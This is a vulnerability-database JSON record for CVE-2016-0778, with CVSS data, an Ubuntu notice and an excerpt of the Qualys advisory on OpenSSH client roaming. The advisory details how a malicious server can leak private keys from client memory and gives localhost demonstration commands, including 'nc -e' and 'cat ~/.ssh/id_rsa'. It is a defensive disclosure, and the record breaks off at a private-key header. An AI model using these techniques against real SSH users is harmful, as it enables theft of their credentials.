"cpe:2.3:a:openbsd:openssh:5.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.9.5", "versionStartIncluding": "10.9.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.10.5", "versionStartIncluding": "10.10.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.11.3", "versionStartIncluding": "10.11.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:hp:virtual_customer_access_system:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.07", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sophos:unified_threat_management_software:9.353:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-0778" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Qualys Security Advisory team", "sources": [ { "db": "BID", "id": "80698" } ], "trust": 0.3 }, "cve": "CVE-2016-0778", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 4.6, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2016-0778", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "VHN-88288", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:H/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "High", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.1, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2016-0778", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-0778", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201601-250", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-88288", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-0778", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. \nSuccessful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================\nUbuntu Security Notice USN-2869-1\nJanuary 14, 2016\n\nopenssh vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nOpenSSH could be made to expose sensitive information over the network. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n openssh-client 1:6.9p1-2ubuntu0.1\n\nUbuntu 15.04:\n openssh-client 1:6.7p1-5ubuntu1.4\n\nUbuntu 14.04 LTS:\n openssh-client 1:6.6p1-2ubuntu2.4\n\nUbuntu 12.04 LTS:\n openssh-client 1:5.9p1-5ubuntu1.8\n\nIn general, a standard system update will make all the necessary changes. \nQualys Security Advisory\n\nRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nInformation Leak (CVE-2016-0777)\n- Analysis\n- Private Key Disclosure\n- Mitigating Factors\n- Examples\nBuffer Overflow (CVE-2016-0778)\n- Analysis\n- Mitigating Factors\n- File Descriptor Leak\nAcknowledgments\nProof Of Concept\n\n\n========================================================================\nSummary\n========================================================================\n\nSince version 5.4 (released on March 8, 2010), the OpenSSH client\nsupports an undocumented feature called roaming: if the connection to an\nSSH server breaks unexpectedly, and if the server supports roaming as\nwell, the client is able to reconnect to the server and resume the\nsuspended SSH session. This information leak may have already been exploited in\nthe wild by sophisticated attackers, and high-profile sites or users may\nneed to regenerate their SSH keys accordingly. \n\nThe buffer overflow, on the other hand, is present in the default\nconfiguration of the OpenSSH client but its exploitation requires two\nnon-default options: a ProxyCommand, and either ForwardAgent (-A) or\nForwardX11 (-X). This buffer overflow is therefore unlikely to have any\nreal-world impact, but provides a particularly interesting case study. \n\nAll OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be\neasily hot-fixed by setting the undocumented option \"UseRoaming\" to\n\"no\", as detailed in the Mitigating Factors section. OpenSSH version\n7.1p2 (released on January 14, 2016) disables roaming by default. \n\n\n========================================================================\nInformation Leak (CVE-2016-0777)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nIf the OpenSSH client connects to an SSH server that offers the key\nexchange algorithm \"resume@appgate.com\", it sends the global request\n\"roaming@appgate.com\" to the server, after successful authentication. If\nthis request is accepted, the client allocates a roaming buffer out_buf,\nby calling malloc() (and not calloc()) with an out_buf_size that is\narbitrarily chosen by the server:\n\n 63 void\n 64 roaming_reply(int type, u_int32_t seq, void *ctxt)\n 65 {\n 66 if (type == SSH2_MSG_REQUEST_FAILURE) {\n 67 logit(\"Server denied roaming\");\n 68 return;\n 69 }\n 70 verbose(\"Roaming enabled\");\n .. \n 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size());\n .. \n 77 }\n\n 40 static size_t out_buf_size = 0;\n 41 static char *out_buf = NULL;\n 42 static size_t out_start;\n 43 static size_t out_last;\n .. \n 75 void\n 76 set_out_buffer_size(size_t size)\n 77 {\n 78 if (size == 0 || size \u003e MAX_ROAMBUF)\n 79 fatal(\"%s: bad buffer size %lu\", __func__, (u_long)size);\n 80 /*\n 81 * The buffer size can only be set once and the buffer will live\n 82 * as long as the session lives. \n 83 */\n 84 if (out_buf == NULL) {\n 85 out_buf_size = size;\n 86 out_buf = xmalloc(size);\n 87 out_start = 0;\n 88 out_last = 0;\n 89 }\n 90 }\n\nThe OpenSSH client\u0027s roaming_write() function, a simple wrapper around\nwrite(), calls wait_for_roaming_reconnect() to transparently reconnect\nto the SSH server after a disconnection. It also calls buf_append() to\ncopy the data sent to the server into the roaming buffer out_buf. During\na reconnection, the client is therefore able to resend the data that was\nnot received by the server because of the disconnection:\n\n198 void\n199 resend_bytes(int fd, u_int64_t *offset)\n200 {\n201 size_t available, needed;\n202\n203 if (out_start \u003c out_last)\n204 available = out_last - out_start;\n205 else\n206 available = out_buf_size;\n207 needed = write_bytes - *offset;\n208 debug3(\"resend_bytes: resend %lu bytes from %llu\",\n209 (unsigned long)needed, (unsigned long long)*offset);\n210 if (needed \u003e available)\n211 fatal(\"Needed to resend more data than in the cache\");\n212 if (out_last \u003c needed) {\n213 int chunkend = needed - out_last;\n214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend,\n215 chunkend);\n216 atomicio(vwrite, fd, out_buf, out_last);\n217 } else {\n218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed);\n219 }\n220 }\n\nIn the OpenSSH client\u0027s roaming buffer out_buf, the most recent data\nsent to the server begins at index out_start and ends at index out_last. \nAs soon as this circular buffer is full, buf_append() maintains the\ninvariant \"out_start = out_last + 1\", and consequently three different\ncases have to be considered:\n\n- \"out_start \u003c out_last\" (lines 203-204): out_buf is not full yet (and\n out_start is still equal to 0), and the amount of data available in\n out_buf is indeed \"out_last - out_start\";\n\n- \"out_start \u003e out_last\" (lines 205-206): out_buf is full (and out_start\n is exactly equal to \"out_last + 1\"), and the amount of data available\n in out_buf is indeed the entire out_buf_size;\n\n- \"out_start == out_last\" (lines 205-206): no data was ever written to\n out_buf (and both out_start and out_last are still equal to 0) because\n no data was ever sent to the server after roaming_reply() was called,\n but the client sends (leaks) the entire uninitialized out_buf to the\n server (line 214), as if out_buf_size bytes of data were available. \n\nIn order to successfully exploit this information leak and retrieve\nsensitive information from the OpenSSH client\u0027s memory (for example,\nprivate SSH keys, or memory addresses useful for further exploitation),\na malicious server needs to:\n\n- Massage the client\u0027s heap before roaming_reply() malloc()ates out_buf,\n and force malloc() to return a previously free()d but uncleansed chunk\n of sensitive information. The simple proof-of-concept in this advisory\n does not implement heap massaging. \n\n- Guess the client\u0027s get_snd_buf_size() in order to precisely control\n out_buf_size. OpenSSH \u003c 6.0 accepts out_buf sizes in the range (0,4G),\n and OpenSSH \u003e= 6.0 accepts sizes in the range (0,2M]. Sizes smaller\n than get_snd_buf_size() are attainable because roaming_reply() does\n not protect \"packet_get_int() + get_snd_buf_size()\" against integer\n wraparound. The proof-of-concept in this advisory attempts to derive\n the client\u0027s get_snd_buf_size() from the get_recv_buf_size() sent by\n the client to the server, and simply chooses a random out_buf_size. \n\n- Advise the client\u0027s resend_bytes() that all \"available\" bytes (the\n entire out_buf_size) are \"needed\" by the server, even if fewer bytes\n were actually written by the client to the server (because the server\n controls the \"*offset\" argument, and resend_bytes() does not protect\n \"needed = write_bytes - *offset\" against integer wraparound). \n\nFinally, a brief digression on a minor bug in resend_bytes(): on 64-bit\nsystems, where \"chunkend\" is a 32-bit signed integer, but \"out_buf\" and\n\"out_buf_size\" are 64-bit variables, \"out_buf + out_buf_size - chunkend\"\nmay point out-of-bounds, if chunkend is negative (if out_buf_size is in\nthe [2G,4G) range). This negative chunkend is then converted to a 64-bit\nsize_t greater than SSIZE_MAX when passed to atomicio(), and eventually\nreturns EFAULT when passed to write() (at least on Linux and OpenBSD),\nthus avoiding an out-of-bounds read from the OpenSSH client\u0027s memory. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure\n------------------------------------------------------------------------\n\nWe initially believed that this information leak in the OpenSSH client\u0027s\nroaming code would not allow a malicious SSH server to steal the\nclient\u0027s private keys, because:\n\n- the information leaked is not read from out-of-bounds memory, but from\n a previously free()d chunk of memory that is recycled to malloc()ate\n the client\u0027s roaming buffer out_buf;\n\n- private keys are loaded from disk into memory and freed by key_free()\n (old API, OpenSSH \u003c 6.7) or sshkey_free() (new API, OpenSSH \u003e= 6.7),\n and both functions properly cleanse the private keys\u0027 memory with\n OPENSSL_cleanse() or explicit_bzero();\n\n- temporary copies of in-memory private keys are freed by buffer_free()\n (old API) or sshbuf_free() (new API), and both functions attempt to\n cleanse these copies with memset() or bzero(). \n\nHowever, we eventually identified three reasons why, in our experiments,\nwe were able to partially or completely retrieve the OpenSSH client\u0027s\nprivate keys through this information leak (depending on the client\u0027s\nversion, compiler, operating system, heap layout, and private keys):\n\n(besides these three reasons, other reasons may exist, as suggested by\nthe CentOS and Fedora examples at the end of this section)\n\n1. If a private SSH key is loaded from disk into memory by fopen() (or\nfdopen()), fgets(), and fclose(), a partial or complete copy of this\nprivate key may remain uncleansed in memory. Indeed, these functions\nmanage their own internal buffers, and whether these buffers are\ncleansed or not depends on the OpenSSH client\u0027s libc (stdio)\nimplementation, but not on OpenSSH itself. \n\n- In all vulnerable OpenSSH versions, SSH\u0027s main() function calls\n load_public_identity_files(), which loads the client\u0027s public keys\n with fopen(), fgets(), and fclose(). Unfortunately, the private keys\n (without the \".pub\" suffix) are loaded first and then discarded, but\n nonetheless buffered in memory by the stdio functions. \n\n- In OpenSSH versions \u003c= 5.6, the load_identity_file() function (called\n by the client\u0027s public-key authentication method) loads a private key\n with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses\n fgets() and hence internal stdio buffering. \n\nInternal stdio buffering is the most severe of the three problems\ndiscussed in this section, although GNU/Linux is not affected because\nthe glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. \nBSD-based systems, on the other hand, are severely affected because they\nsimply malloc()ate and free() stdio buffers. For interesting comments on\nthis issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk\n\n2. In OpenSSH versions \u003e= 5.9, the client\u0027s load_identity_file()\nfunction (called by the public-key authentication method) read()s a\nprivate key in 1024-byte chunks that are appended to a growing buffer (a\nrealloc()ating buffer) with buffer_append() (old API) or sshbuf_put()\n(new API). Unfortunately, the repeated calls to realloc() may leave\npartial copies of the private key uncleansed in memory. \n\n- In OpenSSH \u003c 6.7 (old API), the initial size of such a growing buffer\n is 4096 bytes: if a private-key file is larger than 4K, a partial copy\n of this private key may remain uncleansed in memory (a 3K copy in a 4K\n buffer). Fortunately, only the file of a very large RSA key (for\n example, an 8192-bit RSA key) can exceed 4K. \n\n- In OpenSSH \u003e= 6.7 (new API), the initial size of a growing buffer is\n 256 bytes: if a private-key file is larger than 1K (the size passed to\n read()), a partial copy of this private key may remain uncleansed in\n memory (a 1K copy in a 1K buffer). For example, the file of a\n default-sized 2048-bit RSA key exceeds 1K. \n\nFor more information on this issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources\n\nhttps://cwe.mitre.org/data/definitions/244.html\n\n3. An OpenSSH growing-buffer that holds a private key is eventually\nfreed by buffer_free() (old API) or sshbuf_free() (new API), and both\nfunctions attempt to cleanse the buffer with memset() or bzero() before\nthey call free(). Unfortunately, an optimizing compiler may remove this\nmemset() or bzero() call, because the buffer is written to, but never\nagain read from (an optimization known as Dead Store Elimination). \n\nOpenSSH 6.6 is the only version that is not affected, because it calls\nexplicit_bzero() instead of memset() or bzero(). \n\nDead Store Elimination is the least severe of the three problems\nexplored in this section, because older GCC versions do not remove the\nmemset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5\nand Clang/LLVM do, however, remove it. For detailed discussions of this\nissue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations\n\nhttps://cwe.mitre.org/data/definitions/14.html\n\nhttps://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506\n\nFinally, for these three reasons, passphrase-encrypted SSH keys are\nleaked in their encrypted form, but an attacker may attempt to crack the\npassphrase offline. On the other hand, SSH keys that are available only\nthrough an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the\nundocumented option \"UseRoaming no\" to the system-wide configuration\nfile (usually /etc/ssh/ssh_config), or per-user configuration file\n(~/.ssh/config), or command-line (-o \"UseRoaming no\"). \n\n2. If an OpenSSH client is disconnected from an SSH server that offers\nroaming, it prints \"[connection suspended, press return to resume]\" on\nstderr, and waits for \u0027\\n\u0027 or \u0027\\r\u0027 on stdin (and not on the controlling\nterminal) before it reconnects to the server; advanced users may become\nsuspicious and press Control-C or Control-Z instead, thus avoiding the\ninformation leak:\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume]^Z\n[1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1\n\nHowever, SSH commands that use the local stdin to transfer data to the\nremote server are bound to trigger this reconnection automatically (upon\nreading a \u0027\\n\u0027 or \u0027\\r\u0027 from stdin). Moreover, these non-interactive SSH\ncommands (for example, backup scripts and cron jobs) commonly employ\npublic-key authentication and are therefore perfect targets for this\ninformation leak:\n\n$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.ls\"\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.tar\"\ntar: Removing leading `/\u0027 from member names\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n... \n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\nSimilarly, the SCP client uses the SSH client\u0027s stdin and stdout to\ntransfer data, and can be forced by a malicious SSH server to output a\ncontrol record that ends in \u0027\\n\u0027 (an error message in server-to-client\nmode, or file permissions in client-to-server mode); this \u0027\\n\u0027 is then\nread from stdin by the fgetc() call in wait_for_roaming_reconnect(), and\ntriggers an automatic reconnection that allows the information leak to\nbe exploited without user interaction:\n\n# env ROAMING=\"scp_mode sleep:1\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp\n$ [connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\nlost connection\n\n3. Although a man-in-the-middle attacker can reset the TCP connection\nbetween an OpenSSH client and an OpenSSH server (which does not support\nroaming), it cannot exploit the information leak without breaking server\nhost authentication or integrity protection, because it needs to:\n\n- first, append the \"resume@appgate.com\" algorithm name to the server\u0027s\n initial key exchange message;\n\n- second, in response to the client\u0027s \"roaming@appgate.com\" request,\n change the server\u0027s reply from failure to success. \n\nIn conclusion, an attacker who wishes to exploit this information leak\nmust convince its target OpenSSH client to connect to a malicious server\n(an unlikely scenario), or compromise a trusted server (a more likely\nscenario, for a determined attacker). \n\n4. In the client, wait_for_roaming_reconnect()\ncalls ssh_connect(), the same function that successfully established the\nfirst connection to the server; this function supports four different\nconnection methods, but each method contains a bug and may fail to\nestablish a second connection to the server:\n\n- In OpenSSH \u003e= 6.5 (released on January 30, 2014), the default\n ssh_connect_direct() method (a simple TCP connection) is called by\n wait_for_roaming_reconnect() with a NULL aitop argument, which makes\n it impossible for the client to reconnect to the server:\n\n 418 static int\n 419 ssh_connect_direct(const char *host, struct addrinfo *aitop,\n ... \n 424 int sock = -1, attempt;\n 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV];\n ... \n 430 for (attempt = 0; attempt \u003c connection_attempts; attempt++) {\n ... \n 440 for (ai = aitop; ai; ai = ai-\u003eai_next) {\n ... \n 470 }\n 471 if (sock != -1)\n 472 break; /* Successful connection. */\n 473 }\n 474\n 475 /* Return failure if we didn\u0027t get a successful connection. */\n 476 if (sock == -1) {\n 477 error(\"ssh: connect to host %s port %s: %s\",\n 478 host, strport, strerror(errno));\n 479 return (-1);\n 480 }\n\n Incidentally, this error() call displays stack memory from the\n uninitialized strport[] array, a byproduct of the NULL aitop:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n\n- The special ProxyCommand \"-\" communicates with the server through the\n client\u0027s stdin and stdout, but these file descriptors are close()d by\n packet_backup_state() at the beginning of wait_for_roaming_reconnect()\n and are never reopened again, making it impossible for the client to\n reconnect to the server. Moreover, the fgetc() that waits for \u0027\\n\u0027 or\n \u0027\\r\u0027 on the closed stdin returns EOF and forces the client to exit():\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/nc -e \"/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1\" 127.0.0.1 222\nPseudo-terminal will not be allocated because stdin is not a terminal. \nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that\n passes a connected file descriptor back to the client, but it calls\n fatal() while reconnecting to the server, because waitpid() returns\n ECHILD; indeed, the SIGCHLD handler (installed by SSH\u0027s main() after\n the first successful connection to the server) calls waitpid() before\n ssh_proxy_fdpass_connect() does:\n\n1782 static void\n1783 main_sigchld_handler(int sig)\n1784 {\n.... \n1789 while ((pid = waitpid(-1, \u0026status, WNOHANG)) \u003e 0 ||\n1790 (pid \u003c 0 \u0026\u0026 errno == EINTR))\n1791 ;\n1792\n1793 signal(sig, main_sigchld_handler);\n.... \n1795 }\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 121 /* Fork and execute the proxy command. */\n 122 if ((pid = fork()) == 0) {\n ... \n 157 }\n 158 /* Parent. */\n ... \n 167 while (waitpid(pid, NULL, 0) == -1)\n 168 if (errno != EINTR)\n 169 fatal(\"Couldn\u0027t wait for child: %s\", strerror(errno));\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015\n\n$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand=\"/usr/bin/nc -F %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Couldn\u0027t wait for child: No child processes\n\n- The method ssh_proxy_connect() fork()s a standard ProxyCommand that\n connects the client to the server, but if a disconnection occurs, and\n the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is\n waiting for a \u0027\\n\u0027 or \u0027\\r\u0027 on stdin, EOF is returned (the underlying\n read() returns EINTR) and the client exit()s before it can reconnect\n to the server:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh -o ProxyCommand=\"/bin/nc %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n This behavior is intriguing, because (at least on Linux and BSD) the\n signal() call that installed the main_sigchld_handler() is supposed to\n be equivalent to a sigaction() call with SA_RESTART. However, portable\n versions of OpenSSH override signal() with mysignal(), a function that\n calls sigaction() without SA_RESTART. \n\n This last mitigating factor is actually a race-condition bug that\n depends on the ProxyCommand itself: for example, the client never\n fails to reconnect to the server when using Socat as a ProxyCommand,\n but fails occasionally when using Netcat. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE 